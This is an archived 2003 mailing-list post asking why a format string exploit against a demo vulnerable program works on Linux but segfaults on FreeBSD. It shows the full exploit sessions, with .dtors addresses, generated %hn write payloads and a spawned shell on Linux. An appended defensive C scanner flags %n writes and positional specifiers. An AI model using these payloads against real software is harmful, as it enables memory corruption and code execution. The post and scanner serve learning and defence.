Hi folks, I have a question about format string attacks and the difference between the Linux and *BSD stack. I can manage to exploit some vulnerable programs on Linux, but every attempt to exploit the same on FreeBSD, for example, fails. The only thing I could imagine is that the stack behaviour is somewhat different, so that for example the build*.c from http://www.linuxfocus.org/English/July2001/article191.shtml would produce format strings that are not compliant with FreeBSD... Anyone have a guess where the difference in exploiting format strings is? Or some good URL/doc regarding the specifics of *BSD & format string attacks?

First, here is my doing on Linux (using the vuln.c from the link above):

-------------------------------linux-------------------------------
admin@linux:~> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049a64 ffffffff 00000000                    ........
admin@linux:~> ./bui2 8049a68 8
Calling ./bui2 ...
adr : 134519400 (8049a68)
val : -1073744136 (bffff6f8)
valh: 49151 (bfff)
vall: 63224 (f6f8)
[%.49143x%8$hn%.14073x%9$hn] (34)
Calling ./vuln ...
sc = 0xbffff8be
adr : 134519400 (8049a68)
val : -1073743682 (bffff8be)
valh: 49151 (bfff)
vall: 63678 (f8be)
[%.49143x%8$hn%.14527x%9$hn] (34)
0 0xbffff894
1 0xbffff89b
2 0xbffff8be
3 0xbffff8ec
4 0xbffff8f4
helloWorld() = 0x8048770
accessForbidden() = 0x80487b0
before : ptrf() = 0x8048770 (0xbffff5fc)
buffer = [00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048770 (0xbffff5fc)
Welcome in "helloWorld"
sh-2.05$
-------------------------------linux-------------------------------

Works quite fine ;)

Now, I changed the shellcode of build2 to FreeBSD shellcode and tried to exploit it:

-------------------------------freebsd-------------------------------
> objdump -s -j .dtors vuln

vuln:     file format elf32-i386

Contents of section .dtors:
 8049958 ffffffff 00000000                    ........
> ./bui2 804995c 8
Calling ./bui2 ...
adr : 134519132 (804995c)
val : -1077937316 (bfbffb5c)
valh: 49087 (bfbf)
vall: 64348 (fb5c)
[%.-16457x%8$hn%.15261x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : 134519132 (804995c)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)
[%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcec
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0
before : ptrf() = 0x8048770 (0xbfbffa74)
buffer = [2805f000 ] (127)
after : ptrf() = 0x8048770 (0xbfbffa74)
Welcome in "helloWorld"
Segmentation fault (core dumped)
-------------------------------freebsd-------------------------------

I can try whatever I want (change values, shellcode, padding), it never executes a shell...

What I found out myself is that some values to write with %n seem to trouble FreeBSD. For example, I wanted to write my shellcode address to 0xbfbffa74 (the address of the pointer). On Linux this works fine; on FreeBSD I get *strange* values after writing to 0xbfbffa74:

> ./bui2 0xbfbffa74 8
Calling ./bui2 ...
adr : -1077937548 (bfbffa74)
val : -1077937320 (bfbffb58)
valh: 49087 (bfbf)
vall: 64344 (fb58)
[vú¿¿tú¿¿%.-16457x%8$hn%.15257x%9$hn] (35)
Calling ./vuln ...
sc = 0xbfbffc9f
adr : -1077937548 (bfbffa74)
val : -1077936993 (bfbffc9f)
valh: 49087 (bfbf)
vall: 64671 (fc9f)
[vú¿¿tú¿¿%.-16457x%8$hn%.15584x%9$hn] (35)
0 0xbfbffc74
1 0xbfbffc7b
2 0xbfbffc9f
3 0xbfbffce4
4 0xbfbffcef
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0
before : ptrf() = 0x8048770 (0xbfbffa74)
buffer = [vú¿¿tú¿¿2805f000 ] (127)
after : ptrf() = 0x40517d31 (0xbfbffa74)   // 0x40517d31 !? THAT'S surely NOT my shellcode address (it's sc = 0xbfbffc9f)
Segmentation fault (core dumped)

Anyone have a clue?
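As an added, defender-side example (not from the post above or from the linuxfocus article): a small scanner that parses untrusted input the way a printf-family function would and flags the %n-family writes and positional %N$ references that the payloads quoted above rely on, so an input filter or log-line detector can reject them before they ever reach a printf(buffer) call. The function and struct names are my own.

```c
#include <stddef.h>
#include <string.h>

/* Result of scanning one input string for printf-style conversions. */
struct fmt_scan {
    int conversions;   /* %-conversions found, "%%" excluded           */
    int n_writes;      /* %n, %hn, %hhn, %ln, %lln: these write memory */
    int positional;    /* conversions using the "%N$" argument form     */
};

/* Parses `s` the way a printf-family function would, recognising
 * "%%", flags, width and precision (digits or '*'), "N$" positional
 * references and length modifiers, and counts what it finds.
 * Hypothetical helper; not part of any libc. */
struct fmt_scan scan_format_string(const char *s)
{
    struct fmt_scan r = {0, 0, 0};
    const char *p = s;

    while ((p = strchr(p, '%')) != NULL) {
        int pos = 0;
        p++;                                   /* step past '%'        */
        if (*p == '%') { p++; continue; }      /* "%%" is a literal    */
        /* flags, digits, '.', '*' and '$' form the spec prefix */
        while (*p && strchr("-+ #.*$0123456789", *p)) {
            if (*p == '$') pos = 1;
            p++;
        }
        while (*p && strchr("hlLqjzt", *p))    /* length modifiers     */
            p++;
        if (*p == '\0')                        /* truncated spec       */
            break;
        r.conversions++;
        if (pos) r.positional++;
        if (*p == 'n') r.n_writes++;
        p++;
    }
    return r;
}

/* Untrusted data has no business carrying %n-family writes or
 * positional references; either is a strong signal that the input
 * is a format-string attack payload like the ones quoted above. */
int looks_like_fmt_attack(const char *s)
{
    struct fmt_scan r = scan_format_string(s);
    return r.n_writes > 0 || r.positional > 0;
}
```

Run over the post's own "[%.-16457x%8$hn%.15261x%9$hn]" payload this reports two %hn writes and two positional references; the real fix is still to never pass user data as the format argument (printf("%s", buffer) or fputs), with -Wformat-security catching the printf(buffer) pattern at compile time.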
This archive was generated by hypermail 2b30 : Wed Jun 18 2003 - 10:23:55 PDT